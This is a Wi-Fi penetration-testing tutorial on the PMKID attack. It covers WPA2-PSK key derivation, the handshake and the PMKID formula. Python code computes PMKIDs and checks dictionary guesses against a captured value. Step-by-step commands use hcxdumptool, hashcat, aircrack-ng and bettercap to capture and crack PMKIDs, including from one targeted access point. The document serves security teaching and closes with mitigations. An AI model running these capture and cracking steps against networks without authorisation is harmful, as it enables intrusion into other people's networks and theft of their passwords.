Mastering the PMKID Attack: A Step‑by‑Step Guide to Wi‑Fi Penetration Testing
This article walks through the theory and practical exploitation of the Wi‑Fi PMKID attack, covering authentication basics, the WPA/WPA2 handshake, PMKID generation, and detailed step‑by‑step instructions using tools such as hcxdumptool, hashcat, aircrack‑ng, Airgeddon and bettercap to capture and crack PMKID hashes.
Open System Authentication
Open System Authentication (OSA) is the authentication process defined in the original WEP protocol, allowing a client to connect to any WEP network.
Client discovers SSID and sends a connection request.
AP returns a response.
Client sends an association or authentication request.
AP generates a session‑specific authentication code and sends it to the client.
Shared Key Authentication
Shared Key Authentication is a WEP authentication method that requires the client and the AP to share the same pre‑shared Wi‑Fi password.
Client discovers SSID and sends a connection request.
AP sends an encrypted file that can only be decrypted with the Wi‑Fi password.
Client enters the password and sends an authentication request frame.
AP validates the decrypted file and grants access if the key is correct.
WPA/WPA2 PSK Overview
The article focuses on WPA2‑PSK (pre‑shared key) authentication and the unicast mode between AP and client.
PSK is derived as:
PSK = PBKDF2_HMAC_SHA1(Wi‑Fi password, SSID, SSID length, 4096 iterations)
The SSID acts as the salt, so the same password yields a different PSK on every network name.
In WPA2‑PSK the pre‑shared key is the Pairwise Master Key (PMK). The actual traffic encryption key is derived from the PMK.
PTK = PMK + Anonce + Snonce + MAC(AP) + MAC(Supplicant)
Authenticator = AP
Supplicant = Client
Anonce = AP‑generated random nonce per packet
Snonce = Client‑generated random nonce per packet
For broadcast/multicast the keys become GTK and GMK, derived from the master session key.
Four‑Way Handshake
The four‑way handshake converts source key material into data‑encryption material.
Both client and AP know the PMK, but the PMK itself is not used directly for encrypting data; a PTK is derived from it.
Handshake steps (simplified):
AP sends Anonce; client generates PTK using PMK, MAC addresses, Anonce and its own Snonce.
Client returns Snonce; AP generates the same PTK and includes a MIC field set to 1.
AP derives GTK from GMK, encrypts it with PTK, and sends it to the client.
Client confirms key installation.
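To make the PTK step concrete, here is an added example (not code from the original article) that derives a WPA2 PTK from the PMK with the IEEE 802.11i PRF‑512 and splits it into its KCK, KEK and TK sub‑keys. The SSID, passphrase, MAC addresses and nonces are constructed for the example; the function names are the example's own. It shows why the four‑way handshake matters: the PTK depends on both nonces, so the same PMK produces a different PTK on every association.

```python
# Added example, not from the original article: WPA2 PTK derivation (802.11i PRF-512).
import hashlib
import hmac


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK (= PSK in WPA2-PSK): PBKDF2-HMAC-SHA1, SSID as salt, 4096 rounds, 32 bytes."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, truncated to 64 bytes."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, mac_ap: bytes, mac_sta: bytes, anonce: bytes, snonce: bytes) -> dict:
    """PTK = PRF-512(PMK, "Pairwise key expansion",
                     min(MACs) || max(MACs) || min(nonces) || max(nonces)).
    Returns the WPA2 sub-keys: KCK (EAPOL MIC key), KEK (GTK wrapping key), TK (data key)."""
    data = min(mac_ap, mac_sta) + max(mac_ap, mac_sta) + min(anonce, snonce) + max(anonce, snonce)
    ptk = prf512(pmk, b"Pairwise key expansion", data)
    return {"kck": ptk[0:16], "kek": ptk[16:32], "tk": ptk[32:48]}


# Constructed sample values (locally administered MACs, fixed nonces) for a stand-alone run.
SAMPLE_SSID = "ExampleNet"
SAMPLE_PASSPHRASE = "correct horse battery"
SAMPLE_MAC_AP = bytes.fromhex("020000000001")
SAMPLE_MAC_STA = bytes.fromhex("020000000002")
SAMPLE_ANONCE = bytes(range(32))
SAMPLE_SNONCE = bytes(range(32, 64))


def ptk_changes_with_nonce() -> bool:
    """True if a fresh Anonce yields a different TK even though PMK and MACs are unchanged."""
    pmk = derive_pmk(SAMPLE_PASSPHRASE, SAMPLE_SSID)
    first = derive_ptk(pmk, SAMPLE_MAC_AP, SAMPLE_MAC_STA, SAMPLE_ANONCE, SAMPLE_SNONCE)
    second = derive_ptk(pmk, SAMPLE_MAC_AP, SAMPLE_MAC_STA, bytes(32), SAMPLE_SNONCE)
    return first["tk"] != second["tk"]


if __name__ == "__main__":
    pmk = derive_pmk(SAMPLE_PASSPHRASE, SAMPLE_SSID)
    keys = derive_ptk(pmk, SAMPLE_MAC_AP, SAMPLE_MAC_STA, SAMPLE_ANONCE, SAMPLE_SNONCE)
    for name, value in keys.items():
        print(f"{name.upper()}: {value.hex()}")
    print("TK changes when Anonce changes:", ptk_changes_with_nonce())
```

Because the derivation sorts the two MACs and the two nonces before hashing, both sides compute the same PTK regardless of who is "first"; swapping the arguments in `derive_ptk` gives an identical result.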
PMK Cache and PMKID
After a successful handshake, the AP and client maintain a PMK Security Association (PMKSA) cache.
PMKSA = PMKID + PMK lifetime + MAC addresses + other variables.
PMKID = HMAC‑SHA1‑128(PMK, "PMK Name" + MAC(AP) + MAC(Supplicant))
The router stores the PMKID; on subsequent connections it can validate the PMKID instead of performing the full handshake, reducing roaming latency.
PMKID Attack Principle
Only routers with roaming enabled expose the PMKID vulnerability.
Attack flow:
Capture PMKID → guess Wi‑Fi password with a dictionary → derive PMK → compute PMKID → compare with captured PMKID.
Inputs to this computation:
Wi‑Fi password (guessed)
Wi‑Fi SSID (known)
SSID length (known)
MAC addresses of AP and client (known)
PMK Name string (known)
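The following added example (not code from the original article, and not hcxtools or hashcat code) implements the PMKID formula above and the comparison loop of the attack flow, so that a defender auditing their own network can see exactly what a leaked PMKID exposes: every input except the passphrase is public, so the passphrase's strength is the only thing standing between the captured value and a match. The SSID, passphrase, candidate list and MAC addresses are constructed; the function names are the example's own. The `hashcat_16800_line` helper writes the `PMKID*MAC_AP*MAC_STA*SSID(hex)` text form that hashcat mode 16800 reads.

```python
# Added example, not from the original article: PMKID computation and the
# dictionary check it permits (the formula from the "PMK Cache and PMKID" section).
import hashlib
import hmac


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PSK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA): first 16 bytes of the tag."""
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).digest()[:16]


def hashcat_16800_line(pmkid_value: bytes, mac_ap: bytes, mac_sta: bytes, ssid: str) -> str:
    """Text form consumed by hashcat -m 16800: PMKID*MAC_AP*MAC_STA*SSID, all hex."""
    return "*".join([pmkid_value.hex(), mac_ap.hex(), mac_sta.hex(), ssid.encode().hex()])


def check_candidates(captured: bytes, ssid: str, mac_ap: bytes, mac_sta: bytes, candidates):
    """The article's loop: for each guess derive PMK, recompute PMKID, compare.
    Returns the matching passphrase or None. Constant-time compare avoids timing leaks."""
    for guess in candidates:
        if hmac.compare_digest(pmkid(derive_pmk(guess, ssid), mac_ap, mac_sta), captured):
            return guess
    return None


# Constructed sample network: a weak, dictionary-style passphrase and a short candidate list.
SAMPLE_SSID = "HomeLab-Test"
SAMPLE_PASSPHRASE = "Winter2019!"
SAMPLE_MAC_AP = bytes.fromhex("020000000001")   # constructed, locally administered
SAMPLE_MAC_STA = bytes.fromhex("020000000002")  # constructed, locally administered
SAMPLE_CANDIDATES = ["password", "12345678", "Winter2019!", "letmein123"]


def captured_sample_pmkid() -> bytes:
    """What the AP would include in its first EAPOL frame for this constructed network."""
    return pmkid(derive_pmk(SAMPLE_PASSPHRASE, SAMPLE_SSID), SAMPLE_MAC_AP, SAMPLE_MAC_STA)


if __name__ == "__main__":
    captured = captured_sample_pmkid()
    print("hashcat 16800 line:", hashcat_16800_line(captured, SAMPLE_MAC_AP, SAMPLE_MAC_STA, SAMPLE_SSID))
    print("dictionary result :", check_candidates(captured, SAMPLE_SSID, SAMPLE_MAC_AP, SAMPLE_MAC_STA, SAMPLE_CANDIDATES))
```

Each guess costs one 4096‑round PBKDF2 plus one HMAC, which is why a long random passphrase (or WPA3, which removes the PSK‑derived PMKID entirely) is the mitigation the conclusion recommends. The `derive_pmk` function can be checked against the IEEE 802.11 test vector: passphrase "password" with SSID "IEEE" gives PSK f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e.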
Hashcat lists the following advantages for the PMKID attack:
No legitimate client needed ("no‑client" attack).
No need to wait for a full four‑way handshake.
Avoids retransmission issues of EAPOL frames.
Unaffected by client password entry errors.
Works even when the client is out of range.
Faster because fixed nonces and replay counters are not required.
Produces a simple hexadecimal hash string, no special capture formats needed.
Capturing PMKID with hcxdumptool
Install the required tools and put the Wi‑Fi adapter into monitor mode:
apt install hcxtools aircrack-ng
airmon-ng start wlan0
Capture PMKID frames from all surrounding APs:
hcxdumptool -o demo -i wlan0mon --enable_status 5
Option --enable_status 5 shows only authentication and EAP/EAPOL frames; PMKID can also be captured with status 1.
Converting and Cracking with hashcat
Convert the captured pcapng file to a hashcat‑compatible hash:
hcxpcaptool -z hash demo
Rename the output to pmkidhash and run hashcat:
hashcat -m 16800 --force hash /usr/share/wordlists/rockyou.txt --show
Note that --show only prints results already stored in hashcat's potfile; the first run must be made without it so that the dictionary attack actually executes.
Targeted Capture of a Single AP
Record the target AP’s MAC address in a file named target. Then capture only that AP’s PMKID:
hcxdumptool -o raj -i wlan0mon --enable_status=1 --filterlist_ap=target --filtermode=2
Convert and crack as before:
hcxpcaptool -z pmkidhash raj
hashcat -m 16800 --force pmkidhash /usr/share/wordlists/rockyou.txt --show
Alternative Tools: aircrack‑ng, Airgeddon, bettercap
Convert the pcapng file to pcap and crack directly with aircrack‑ng:
file demo
tcpdump -r demo -w demo.pcap
aircrack-ng demo.pcap -w /usr/share/wordlists/rockyou.txt
Airgeddon provides a menu‑driven CLI that automates the entire PMKID capture and cracking workflow with a few numeric selections.
Using bettercap (after installing an older libpcap version) the steps are:
wget http://old.kali.org/kali/pool/main/libp/libpcap/libpcap0.8_1.9.1-4_amd64.deb
dpkg -i libpcap0.8_1.9.1-4_amd64.deb
bettercap
set wifi.interface wlan0mon
wifi.recon on
wifi.show
wifi.assoc 68:14:01:5a:0e:9c
The captured PMKID is saved to /root/bettercap-wifi-handshakes.pcap. Convert and crack with hashcat as shown earlier.
Conclusion
The PMKID attack poses a serious threat to both home and enterprise Wi‑Fi networks because it can be performed without a legitimate client and without capturing a full four‑way handshake. Using strong passwords and migrating to WPA3 are essential mitigations.